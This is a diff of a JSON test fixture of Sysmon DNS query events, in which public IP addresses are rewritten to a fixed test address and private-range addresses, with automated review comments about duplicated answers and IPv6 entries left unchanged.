@@ -11422,7 +11304,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11430,7 +11312,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11438,22 +11320,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { 
@@ -11469,23 +11351,20 @@ "sync.mathtag.com" ], "ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741882800Z", + "ingested": "2021-12-09T13:50:23.457251300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11553,12 +11432,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { 
@@ -11575,13 +11454,13 @@ "status.rapidssl.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741886500Z", + "ingested": "2021-12-09T13:50:23.457257100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", 
@@ -11645,39 +11524,39 @@ "type": "CNAME" }, { - "data": "34.197.195.131", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.192.39.82", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.231.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.113.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.197.3.157", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.205.112.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.195.29.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.201.247.123", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11685,22 +11564,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
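Review bot: Replacing all eight distinct A records with the same address leaves `dns.resolved_ip` holding eight copies of `89.160.20.156` in this hunk while the same event's `related.ip` collapses to a single entry, so the fixture no longer exercises the multi-answer path it previously covered and the duplicated list is now what the test pins as correct. If the only goal is to stay inside the supported GeoIP subset, using several distinct addresses from that subset would keep the answer list varied; otherwise it is worth confirming that duplicates in `dns.resolved_ip` are intended rather than a missing de-duplication step in the pipeline. The `event.ingested` values changing alongside suggest this is a regenerated expected file; if so, the substitution belongs in the raw input events and this file should be regenerated rather than edited by hand. The enclosing event object starts and ends outside this hunk.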
@@ -11716,23 +11595,16 @@ "sync.extend.tv" ], "ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741892700Z", + "ingested": "2021-12-09T13:50:23.457263100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11796,11 +11668,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11808,7 +11680,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11816,7 +11688,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11824,7 +11696,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -11832,21 +11704,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
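Review bot: The IPv4 gTLD-server answers (`192.5.6.30`, `192.33.14.30`, `192.26.92.30`, `192.31.80.30`, `192.12.94.30`) are moved into RFC 1918 space, but their IPv6 counterparts `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30` and `2001:500:856e::30` are left untouched in the same `resolved_ip` and `related.ip` lists, so the fixture still carries real public addresses after a change whose stated purpose is to confine test IPs to a supported subset. If the IPv6 entries are also outside that subset they should get the same treatment, for example a documentation prefix such as `2001:db8::` addresses, or the change description should say why only IPv4 was rewritten. Note also that the result pairs private IPv4 glue with public IPv6 glue for the same name servers, which is harmless for a pipeline test but no longer resembles real resolver output. The enclosing event object starts and ends outside this hunk.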
@@ -11862,22 +11734,22 @@ "ocsp.comodoca.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741898500Z", + "ingested": "2021-12-09T13:50:23.457268900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11949,27 +11821,27 @@ "type": "CNAME" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -11987,16 +11859,13 @@ "sync-tm.everesttech.net" ], "ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741906Z", + "ingested": "2021-12-09T13:50:23.457274700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12056,11 +11925,11 @@ }, "answers": [ { - "data": "34.95.92.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12068,7 +11937,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -12076,7 +11945,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12084,7 +11953,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12092,7 +11961,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -12100,23 +11969,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -12131,24 +12000,24 @@ "idsync.rlcdn.com" ], "ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741914800Z", + "ingested": "2021-12-09T13:50:23.457280500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 